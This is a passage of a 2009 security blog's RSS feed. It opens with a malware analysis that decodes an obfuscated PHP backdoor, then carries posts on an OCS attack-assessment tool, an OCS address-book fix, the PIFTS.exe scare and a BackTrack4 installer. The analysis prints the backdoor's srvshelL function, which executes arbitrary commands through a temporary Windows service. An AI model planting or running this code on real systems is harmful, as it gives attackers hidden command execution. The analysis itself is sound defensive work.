<blockquote><p><b>In PHP, i tried replacing eval() with echo() and guess what it worked like a charm <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </b></p>
</blockquote>
<p>After running the modified encoded php file, it decoded all the code and spit it on my stdout. I redirected it in file and started analyzing&#8230;</p>
<p>It was again a php code containing handful functions to achieve tasks like &#8211; mass mailing, dictionary attack, port scan, sql injection etc etc.</p>
<p>Here is one of the decoded function</p>
<pre>function srvshelL($command){    $name=whereistmP()."\\".uniqid('NJ');    $n=uniqid('NJ');    $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];    win32_create_service(array('service'=&gt;$n,'display'=&gt;$n,'path'=&gt;$cmd,'params'=&gt;"/c $command &gt;\"$name\""));    win32_start_service($n);    win32_stop_service($n);    win32_delete_service($n);    while(!file_exists($name))sleep(1);    $exec=file_get_contents($name);    unlink($name);    return $exec;}</pre>
<p>I tested the output of echo() trick with the php file downloaded from internet. It was same. Here is the php code used for decoding of eval(gzinflate(base64_decode()))) code.</p>
<pre>&lt;?php/*Taken from http://www.php.net/manual/de/function.eval.php#59862Directions:1. Save this snippet as decrypt.php2. Save encoded PHP code in coded.txt3. Create a blank file called decoded.txt (from shell do CHMOD 0666 decoded.txt)4. Execute this script (visit decrypt.php in a web browser or do php decrypt.php in the shell)5. Open decoded.txt, the PHP should be decrypted if not post the code on http://www.ariadoss.com/forums/web-development/lamp*/

 echo "\nDECODE nested eval(gzinflate()) by DEBO Jurgen &lt;jurgen@person.be&gt;\n\n";

 echo "1. Reading coded.txt\n";

 $fp1 = fopen ("coded.txt", "r"); $contents = fread ($fp1, filesize ("coded.txt")); fclose($fp1);

 echo "2. Decoding\n";

 while (preg_match("/eval\(gzinflate/",$contents)) {     $contents=preg_replace("/&lt;\?|\?&gt;/", "", $contents);     eval(preg_replace("/eval/", "\$contents=", $contents)); } echo "3. Writing decoded.txt\n"; 

 $fp2 = fopen("decoded.txt","w"); fwrite($fp2, trim($contents)); fclose($fp2);?&gt;</pre>
<p><b>Enjoy!!</b></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/bughira.wordpress.com/341/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/bughira.wordpress.com/341/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/bughira.wordpress.com/341/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/bughira.wordpress.com/341/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/bughira.wordpress.com/341/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/bughira.wordpress.com/341/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/bughira.wordpress.com/341/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/bughira.wordpress.com/341/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/bughira.wordpress.com/341/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/bughira.wordpress.com/341/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/bughira.wordpress.com/341/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/bughira.wordpress.com/341/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/bughira.wordpress.com/341/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/bughira.wordpress.com/341/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bughira.wordpress.com&amp;blog=3478846&amp;post=341&amp;subd=bughira&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://bughira.wordpress.com/2009/05/12/decode-eval_gzinflate_base64_decode/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/66d6f3751ae21240285913c9b962f9a4?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">bughira</media:title>
		</media:content>
	</item>
		<item>
		<title>OAT: First ever M$ OCS Assessment Tool Released</title>
		<link>http://bughira.wordpress.com/2009/04/02/oat-first-ever-m-ocs-assessment-tool-released/</link>
		<comments>http://bughira.wordpress.com/2009/04/02/oat-first-ever-m-ocs-assessment-tool-released/#comments</comments>
		<pubDate>Thu, 02 Apr 2009 12:58:17 +0000</pubDate>
		<dc:creator>bughira</dc:creator>
				<category><![CDATA[General Talks]]></category>
		<category><![CDATA[Information Security]]></category>
		<category><![CDATA[OCS]]></category>
		<category><![CDATA[Security Tools]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Voice Over IP]]></category>
		<category><![CDATA[OAT]]></category>
		<category><![CDATA[OCS Assessment Tool]]></category>
		<category><![CDATA[OCS security]]></category>
		<category><![CDATA[VIPER Lab]]></category>
		<category><![CDATA[VoIP Security]]></category>

		<guid isPermaLink="false">http://bughira.wordpress.com/?p=328</guid>
		<description><![CDATA[Sipera VIPER Lab is in news again; this time by targeting Award Winning UC solution from Microsoft.  Viper Lab released first ever Microsoft Office Communication Server Assessment Tool (OAT) at VoiceCon 2009 in Orlando. Tool is named OAT and is develop to help IT manager and security practitioners evaluate the security architecture of their deployments [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bughira.wordpress.com&amp;blog=3478846&amp;post=328&amp;subd=bughira&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Sipera <a href="http://viperlab.net" target="_blank">VIPER Lab</a> is in news again; this time by targeting Award Winning UC solution from Microsoft.  Viper Lab released first ever Microsoft <strong>O</strong>ffice Communication Server <strong>A</strong>ssessment <strong>T</strong>ool <strong>(OAT)</strong> at <a href="http://www.voicecon.com/" target="_blank">VoiceCon </a>2009 in Orlando. Tool is named OAT and is develop to help IT manager and security practitioners evaluate the security architecture of their deployments and ensure that their mission-critical communications and systems are protected.</p>
<p><img class="aligncenter size-full wp-image-333" title="oat" src="http://bughira.files.wordpress.com/2009/04/oat.jpg?w=600&#038;h=479" alt="oat" width="600" height="479" /></p>
<p>This tool is completely written in C# and released under BSD License. It has nice user friendly GUI with following features:</p>
<ul>
<li> Online Dictionary Attack</li>
<li> Presence Stealing</li>
<li> Contact List Stealing</li>
<li> Single User Flood Mode</li>
<li> Domain Flood Mode</li>
<li> Call Walk</li>
<li> Play Spam Audio</li>
<li> Detailed Report Generation</li>
</ul>
<p>A detailed description of what these features are and how they can be used can be found <a href="http://voat.sourceforge.net/features.html" target="_blank">here.</a></p>
<p>Once Online Dictionary Attack is successful against the target user, attacker can launch different attacks on the users configured for Communication Server or on the Roaming contact of target user depending on OAT Attack mode.</p>
<p>According to the OAT documentation; OAT works in two different scenarios</p>
<ul>
<li><strong>Internal Network Attack Mode </strong>
<ul>
<li>OAT sits inside the corporate network and directly connects to Front End Pool Servers and Authenticate against Active Directory simulating the internal attacker scenario.</li>
</ul>
</li>
</ul>
<ul>
<li><strong>External Network Attack Mode </strong>
<ul>
<li>In this mode OAT can be launched anywhere from internet and connects to Access Edge Server for presence and IM; It is also authenticated using Active Directory and uses A/V Edge for other assessment features.</li>
</ul>
</li>
</ul>
<blockquote>
<h3>With the release of OAT, its clear that Security Researchers are gearing up for Microsoft UC Solution.</h3>
</blockquote>
<h2>References</h2>
<ul>
<li><a href="http://voat.sf.net" target="_blank">OCS Assessment Tool (OAT)</a></li>
<li><a href="http://voat.sourceforge.net/gallery.html" target="_blank">OAT Gallery</a></li>
</ul>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/bughira.wordpress.com/328/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/bughira.wordpress.com/328/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/bughira.wordpress.com/328/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/bughira.wordpress.com/328/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/bughira.wordpress.com/328/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/bughira.wordpress.com/328/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/bughira.wordpress.com/328/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/bughira.wordpress.com/328/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/bughira.wordpress.com/328/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/bughira.wordpress.com/328/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/bughira.wordpress.com/328/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/bughira.wordpress.com/328/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/bughira.wordpress.com/328/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/bughira.wordpress.com/328/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bughira.wordpress.com&amp;blog=3478846&amp;post=328&amp;subd=bughira&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://bughira.wordpress.com/2009/04/02/oat-first-ever-m-ocs-assessment-tool-released/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/66d6f3751ae21240285913c9b962f9a4?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">bughira</media:title>
		</media:content>

		<media:content url="http://bughira.files.wordpress.com/2009/04/oat.jpg" medium="image">
			<media:title type="html">oat</media:title>
		</media:content>
	</item>
		<item>
		<title>Cannot Synchronize Address Book: Resolved</title>
		<link>http://bughira.wordpress.com/2009/03/13/cannot-synchronize-address-book-resolved/</link>
		<comments>http://bughira.wordpress.com/2009/03/13/cannot-synchronize-address-book-resolved/#comments</comments>
		<pubDate>Fri, 13 Mar 2009 12:54:19 +0000</pubDate>
		<dc:creator>bughira</dc:creator>
				<category><![CDATA[HOWTO's]]></category>
		<category><![CDATA[OCS]]></category>
		<category><![CDATA[Voice Over IP]]></category>
		<category><![CDATA[0xC3FC200D]]></category>
		<category><![CDATA[Cannot Synchronize Address Book]]></category>
		<category><![CDATA[D-0ba0-0ba2.dabs]]></category>
		<category><![CDATA[OCS Communicator]]></category>
		<category><![CDATA[Office Communication Server]]></category>
		<category><![CDATA[Outlook Synchronization]]></category>

		<guid isPermaLink="false">http://bughira.wordpress.com/?p=316</guid>
		<description><![CDATA[Like most of the users I too used to get &#8220;Cannot Synchronize Address Book&#8221; notification whenever i used to login in my OCS Communicator client. This happened when we do custom installation of any application, do not configure optional features etc. I used to ignore that notification most of the time except today. I got [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bughira.wordpress.com&amp;blog=3478846&amp;post=316&amp;subd=bughira&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Like most of the users I too used to get <strong>&#8220;Cannot Synchronize Address Book&#8221;</strong> notification whenever i used to login in my OCS Communicator client. This happened when we do custom installation of any application, do not configure optional features etc.</p>
<p>I used to ignore that notification most of the time except today. I got irritated by yellow exclamation mark <img class="alignnone size-full wp-image-318" title="comnot" src="http://bughira.files.wordpress.com/2009/03/comnot.png?w=600" alt="comnot"   /> on Communicator Icon in system tray and I decided to hunt down the problem.<br />
I didnt do much on my own except following paths shown by Google. I searched for a while, went through some forums and fixed the problem(s).<br />
<img class="aligncenter size-full wp-image-319" title="error1" src="http://bughira.files.wordpress.com/2009/03/error1.png?w=600&#038;h=90" alt="error1" width="600" height="90" /></p>
<p>This post is to summarize the working steps gathered from different forums. Following are the steps that i followed in the process.</p>
<ul>
<li>Open the Office Communications Server 2007 management console and Expand server running with web components service.</li>
</ul>
<p style="text-align:center;"><a href="http://bughira.files.wordpress.com/2009/03/webcomp2.png" target="_blank"><img class="aligncenter size-full wp-image-323" title="webcomp2" src="http://bughira.files.wordpress.com/2009/03/webcomp2.png?w=600&#038;h=183" alt="webcomp2" width="600" height="183" /></a></p>
<ul>
<li>From the Available Task in right pane, Expand Validation and Select and complete the Web Components Server Validation wizard.
<ul>
<li>If wizard failes with Connectivity error &#8220;Failure [0xC3FC200D] One or more errors were detected.&#8221; then problem is <strong>Default website on Web Component Server is not assigned with valid/no  certificate. </strong>Refer<a href="http://support.microsoft.com/kb/939530/en-us" target="_blank"> here to fix this.</a></li>
<li>If the Validation Wizard fails with <strong>GroupExpansion</strong> and <strong>AddressBookServer Configuration</strong> then the problem is because <em>Windows Server 2003 SP1 includes a new security feature named loopback check functionality</em>. Validation wizard tries to visit following URL&#8217;s but fails  due to authentication failure. However, if you visit the same URL&#8217;s from system; other than Web Component Server, it works perfectly.
<ul>
<li>https://[ocs_server_pool]/GroupExpansion/Int/service.asmx</li>
<li>https://[ocs_server_pool]/Abs/Int/Handler/D-0ba0-0ba2.dabs</li>
</ul>
</li>
<li>Microsoft has already documented workarounds for these error. Follow the references and you are through.</li>
</ul>
</li>
<li>Once the problem is resolved you can search needed users contact details as shown in following screen shots.      I am now happy to see my communicator free from <span style="color:#ffff00;">Yellow</span> Exclamation mark <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </li>
</ul>
<p><img class="aligncenter size-full wp-image-320" title="afterabs" src="http://bughira.files.wordpress.com/2009/03/afterabs.png?w=600" alt="afterabs"   /></p>
<h2>References:</h2>
<ol>
<li><a href="http://support.microsoft.com/kb/939530/en-us" target="_blank">Assign Certificate to Default Web Site</a></li>
<li><a href="http://support.microsoft.com/kb/926642" target="_blank">Workaround for Loopback Check</a></li>
</ol>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/bughira.wordpress.com/316/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/bughira.wordpress.com/316/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/bughira.wordpress.com/316/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/bughira.wordpress.com/316/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/bughira.wordpress.com/316/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/bughira.wordpress.com/316/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/bughira.wordpress.com/316/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/bughira.wordpress.com/316/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/bughira.wordpress.com/316/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/bughira.wordpress.com/316/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/bughira.wordpress.com/316/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/bughira.wordpress.com/316/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/bughira.wordpress.com/316/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/bughira.wordpress.com/316/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bughira.wordpress.com&amp;blog=3478846&amp;post=316&amp;subd=bughira&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://bughira.wordpress.com/2009/03/13/cannot-synchronize-address-book-resolved/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/66d6f3751ae21240285913c9b962f9a4?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">bughira</media:title>
		</media:content>

		<media:content url="http://bughira.files.wordpress.com/2009/03/comnot.png" medium="image">
			<media:title type="html">comnot</media:title>
		</media:content>

		<media:content url="http://bughira.files.wordpress.com/2009/03/error1.png" medium="image">
			<media:title type="html">error1</media:title>
		</media:content>

		<media:content url="http://bughira.files.wordpress.com/2009/03/webcomp2.png" medium="image">
			<media:title type="html">webcomp2</media:title>
		</media:content>

		<media:content url="http://bughira.files.wordpress.com/2009/03/afterabs.png" medium="image">
			<media:title type="html">afterabs</media:title>
		</media:content>
	</item>
		<item>
		<title>Whats all fuss about PIFTS.exe?</title>
		<link>http://bughira.wordpress.com/2009/03/12/whats-all-fuss-about-piftsexe/</link>
		<comments>http://bughira.wordpress.com/2009/03/12/whats-all-fuss-about-piftsexe/#comments</comments>
		<pubDate>Thu, 12 Mar 2009 11:12:14 +0000</pubDate>
		<dc:creator>bughira</dc:creator>
				<category><![CDATA[General Talks]]></category>
		<category><![CDATA[Information Security]]></category>
		<category><![CDATA[Malware Analysis]]></category>
		<category><![CDATA[Virtualization]]></category>
		<category><![CDATA[Norton Patch]]></category>
		<category><![CDATA[PATCH021809DB]]></category>
		<category><![CDATA[PIFTS.exe]]></category>
		<category><![CDATA[Symantec]]></category>

		<guid isPermaLink="false">http://bughira.wordpress.com/?p=307</guid>
		<description><![CDATA[March 9 was interesting and chaotic day for the  people using Norton Antivirus as they started getting alerts about some binary named PIFTS.exe is trying to reach Internet. When analyzed, people found its traces in Norton Antivirus. This was weired. How does Norton alerting for its own applications? It looked suspicious and people started asking [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bughira.wordpress.com&amp;blog=3478846&amp;post=307&amp;subd=bughira&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>March 9 was interesting and chaotic day for the  people using <a href="http://www.symantec.com/norton/antivirus" target="_blank">Norton Antivirus</a> as they started getting alerts about some binary named <strong>PIFTS.exe</strong> is trying to reach Internet. When analyzed, people  found its traces in Norton Antivirus. This was weired. How does Norton alerting for its own applications? It looked suspicious and people started asking  questions on Norton Support Forum. Interestingly, Norton deleted all the questions forum posts regarding this incident which raised suspiciousness towards <strong>PIFTS.exe</strong> and chaos started.</p>
<p><img class="aligncenter size-full wp-image-308" title="pifts1" src="http://bughira.files.wordpress.com/2009/03/pifts1.jpg?w=600&#038;h=219" alt="pifts1" width="600" height="219" /></p>
<p>When analyzed, some following results came out.</p>
<ol>
<li>Binaray is not packed or encrypted in any way.</li>
<li>Its around 100 KB in size</li>
<li>It tries to make  an outbound connection to <strong>http://stats.norton.com</strong> using UserAgent: PATCH021809DB</li>
<li>When allowed to reach internet, it tries to reach <strong>http://stats.norton.com/n/p?module=2667&amp;product=unknown&amp;version=-1&amp;e=-1&amp;f=-1&amp;g=-1&amp;h=-1&amp;i=0&amp;j=-1</strong> which<br />
resolves to <strong>67.134.208.160 </strong></li>
<li>A quick DNS and whois lookup showed above IP is registered to Swapdrive in Washington.</li>
<li>Googling about <em>Swapdrive</em> showed <em>Swapdrive</em> is part of Symantec.</li>
<li>Both VirusTotal and ThreatExpert gave <strong>PIFTS.exe clean chit.</strong></li>
</ol>
<p><strong><img class="aligncenter size-full wp-image-309" title="pifts3" src="http://bughira.files.wordpress.com/2009/03/pifts3.jpg?w=600" alt="pifts3"   /><br />
</strong></p>
<p>All this lead to a big chaos and people started raising Questions like Why its connecting to stats.norton.com? Did Norton get Compromised? etc etc  Some  conclusion out of above results also came up like <em>Norton is stealing personal information</em> from host machines or <em>Norton is trying to cover up some past unknown issues </em>etc etc.   All these concluding discussions got more prominent when <a href="http://community.norton.com/norton/" target="_blank">Norton Support Forum</a> starts deleting all the queries about the so called culprit/fishy application. Finally on 10th March, Symantec spoke about the whole fuss. Heres what Symantec commented.</p>
<blockquote><p>&#8220;Symantec released a diagnostic patch <strong>&#8220;PIFTS.exe&#8221;</strong> targeting Norton Internet Security and Norton Antivirus 2006 &amp; 2007 users on March 9, 2009.<br />
In a case of human error, the patch was released by Symantec &#8220;unsigned&#8221;, which caused the firewall user prompt for this file to access the Internet.&#8221;</p></blockquote>
<p>Symantec also clarified the reason behind deleting all the posts about PIFTS.exe claiming they received spam from 600+ newly created users.These spam forum posts contained no text in the body of the message, simply a subject:</p>
<ul>
<li> O LAWD IM CHOKIN ON PIFTS PLZ HALP</li>
<li> OH GOD YOU GOT CHOCOLATE IN MY PIFTS</li>
<li> If you wanna be my NORTON/ you gotta deal with my P ! F T S . E X E</li>
<li> IF PIFTS.EXE WAS HERE, THEN WHO WAS PHONE?</li>
<li> PIFTS.EXE PIFTS.EXE PIFTS.EXE PIFTS.EXE PIFTS.EXE PIFTS.EXE PIFTS.EXE</li>
<li> I LOVE MY PIFTS.EXE</li>
</ul>
<p>Internet savvy people as usual started googling about this incident and trying to digg deeper. Some hackers took advantage of this plot and planted Malwares on web sites mentioning about the incident. Once you visit such sites, malware automatically gets downloaded on your system.<br />
I hope Symatec has cleared the chaos  and people are now aware of the root cause. With all those happened I wonder <strong>How can Symantec QA miss this basic test case of checking signatures on all the released patches?</strong></p>
<blockquote><p>Lets hope Symantec human error do not miss test case of validating virus Singatures <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p></blockquote>
<h2>References:</h2>
<ol>
<li><a href="http://www.threatexpert.com/report.aspx?md5=91b564d825a3487ae5b5fafe57260810" target="_blank">ThreaExpert Automated Analysis</a></li>
<li><a href="http://www.virustotal.com/analisis/f3efee14f2aecc9a8b684d2ec65bda66" target="_blank">Virustotal Analysis</a></li>
<li><a href="http://community.norton.com/t5/Norton-Protection-Blog/Symantec-Comments-on-PIFTS-exe/bc-p/74977" target="_blank">Norton Support Community Response</a></li>
<li><a href="http://ws.arin.net/whois/?queryinput=!%20NET-67-134-208-128-1" target="_blank">Whois Query Result</a></li>
<li>Snip from Strings.</li>
</ol>
<pre>    d:\perforce\entiredepot\consumer_crt\patchtools\patch021809db\release\PIFTS.pdb
    http://stats.norton.com/n/p?module=2667
    SOFTWARE\Symantec\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\HbEngine
    SOFTWARE\Symantec\PIF\{96E26A03-A25A-400b-B9B4-564C9BD00F46}
    The ping url is %s
    PATCH021809DB
    Norton Internet Security
    NCOAlert.dll
    NTPAlert.dll
    NAV
    NavUI.dll
    NavProd.dll
    Norton SystemWorks
    NSWAlert.dll
    NSWCfg.dll
    PollMgr.dll
    PifEng.dll</pre>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/bughira.wordpress.com/307/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/bughira.wordpress.com/307/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/bughira.wordpress.com/307/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/bughira.wordpress.com/307/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/bughira.wordpress.com/307/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/bughira.wordpress.com/307/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/bughira.wordpress.com/307/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/bughira.wordpress.com/307/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/bughira.wordpress.com/307/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/bughira.wordpress.com/307/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/bughira.wordpress.com/307/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/bughira.wordpress.com/307/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/bughira.wordpress.com/307/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/bughira.wordpress.com/307/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bughira.wordpress.com&amp;blog=3478846&amp;post=307&amp;subd=bughira&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://bughira.wordpress.com/2009/03/12/whats-all-fuss-about-piftsexe/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/66d6f3751ae21240285913c9b962f9a4?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">bughira</media:title>
		</media:content>

		<media:content url="http://bughira.files.wordpress.com/2009/03/pifts1.jpg" medium="image">
			<media:title type="html">pifts1</media:title>
		</media:content>

		<media:content url="http://bughira.files.wordpress.com/2009/03/pifts3.jpg" medium="image">
			<media:title type="html">pifts3</media:title>
		</media:content>
	</item>
		<item>
		<title>BT4Install: Simplest way to install BackTrack4</title>
		<link>http://bughira.wordpress.com/2009/03/10/bt4install-simplest-way-to-install-backtrack4/</link>
		<comments>http://bughira.wordpress.com/2009/03/10/bt4install-simplest-way-to-install-backtrack4/#comments</comments>
		<pubDate>Tue, 10 Mar 2009 12:07:13 +0000</pubDate>
		<dc:creator>bughira</dc:creator>
				<category><![CDATA[HOWTO's]]></category>
		<category><![CDATA[Information Security]]></category>
		<category><![CDATA[Security Tools]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[VMWare]]></category>
		<category><![CDATA[Back Track Installer]]></category>
		<category><![CDATA[BackTrack4]]></category>
		<category><![CDATA[BT4 Install]]></category>
		<category><![CDATA[HDD install]]></category>
		<category><![CDATA[Install BackTrack on HDD]]></category>

		<guid isPermaLink="false">http://bughira.wordpress.com/?p=282</guid>
		<description><![CDATA[Remote-exploit and BackTrack team did public Beta release of BackTrack 4 in second week 0f February.  As soon as this news came out, all sorts of people were on its download spree. Within 5 days, download count reached to 49,000+ for ISO and 17,000+ for VMWare Image. I too got its copy on very first [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bughira.wordpress.com&amp;blog=3478846&amp;post=282&amp;subd=bughira&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Remote-exploit and BackTrack team did<a href="http://backtrack4.blogspot.com/2009/02/backtrack-4-beta-public-released.html" target="_blank"> public Beta release of BackTrack 4</a> in second week 0f February.  As soon as this news came out, all sorts of people were on its download spree.<br />
Within 5 days, download count reached to 49,000+ for ISO and 17,000+ for VMWare Image. I too got its copy on very first day <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /><br />
As BT4 is still in its Beta phase, lot of packages are missing especially VoIP section and Services section. So you will need to manually start and control the services like sshd, vnc etc.<br />
One more prominent change you will observe is DHCP configurations  and dhcp client (dhcpcd) are deliberately removed from startup script. BackTrack 4 starts in <a href="http://en.wikipedia.org/wiki/Runlevel" target="_blank">runlevel</a> 2 where networking is disabled. Anyways this post is not about the BT3 and BT4 comparison, lets get on track.</p>
<p>From my <a href="http://bughira.wordpress.com/2009/01/18/backtrack3-installer-simplest-way-to-install-bt3-on-hdd/" target="_blank">previous post</a> about automated HDD installation of BackTrack3, i got comment and emails asking for BT4 Installer support as BT4 Beta does not have installer in it yet.<br />
My old BT3Install.tar installer does not work on BT4 due to changes made by BackTrack team <img src='http://s0.wp.com/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' />  .   They introduces a new shell called &#8220;<a href="http://en.wikipedia.org/wiki/Debian_Almquist_shell" target="_blank">Debian Almquist shell (Dash)</a>&#8221; and /bin/sh is now a symlink to /bin/dash. It looks like &#8220;dash&#8221; shell does not support most of the semantics of legacy bash shell.  As per wikipedia &#8211; Dash is a direct descendant of the NetBSD version of the Almquist Shell (ash)</p>
<p><img class="aligncenter size-full wp-image-284" title="bt4" src="http://bughira.files.wordpress.com/2009/03/bt4.jpg?w=600&#038;h=155" alt="bt4" width="600" height="155" /></p>
<p>I have modified the original BT3Install install script and done some reported bug fixes in this release of BT4Install. I have tested it under my VMWare and its working fine. This install script is still not generic, i am planning to add pre-requisite checks before starting the installation wizard in near future. Currently slammed with lot of other intersting stuffs which i will talk about soon..</p>
<p><img class="aligncenter size-full wp-image-285" title="bt4_1" src="http://bughira.files.wordpress.com/2009/03/bt4_1.png?w=600" alt="bt4_1"   /><br />
Following are some of the screen shots of BT4Install in action. Please feel free to let me know if you need BT4Install, i will be more than happy to email it.  I have tried not to repeat whole installation procedure in this post. However, interested people or newbies might want to  go through BT3Install post.</p>
<p style="text-align:center;"><img class="size-full wp-image-287 aligncenter" title="bt4_21" src="http://bughira.files.wordpress.com/2009/03/bt4_21.png?w=600" alt="bt4_21"   /></p>
<ul>
<li>
<h2>Some important points to keep in mind.</h2>
</li>
</ul>
<p>Installing BackTrack needs at least 4 GB of free space on Hard drive. BT4 Beta has foot print of 856 MB without having voip packages.  It is definitely going to touch 1 GB mark in near future. So Make sure you have enough hard disk space before starting installation.</p>
<p><img class="aligncenter size-full wp-image-300" title="bt4_51" src="http://bughira.files.wordpress.com/2009/03/bt4_51.png?w=600" alt="bt4_51"   /></p>
<p>Express Install is also supported and tested. I will recommend using Express Install only when you have taken backup of important stuffs from existing OS installation and want to install BT4 by cleaning all of its traces.</p>
<blockquote><p>Manual mode installation assumes partitions to be already created before proceeding.</p></blockquote>
<p>Express mode install does not support installation on clean and unpartitioned hard disk. Following are some of the screenshots of Express Mode installation in action.</p>
<p>Enjoy BackTrack 4 and stay safe.</p>
<h2>Reference:</h2>
<ol>
<li><a href="http://bughira.wordpress.com/2009/01/18/backtrack3-installer-simplest-way-to-install-bt3-on-hdd/" target="_blank">BT3Install</a></li>
<li><a href="http://www.offensive-security.com/documentation/bt4install.pdf" target="_blank">BackTrack4 Beta:  The perfect hard disk install.</a></li>
</ol>
<p><img class="aligncenter size-full wp-image-298" title="exp42" src="http://bughira.files.wordpress.com/2009/03/exp42.png?w=600&#038;h=450" alt="exp42" width="600" height="450" /></p>
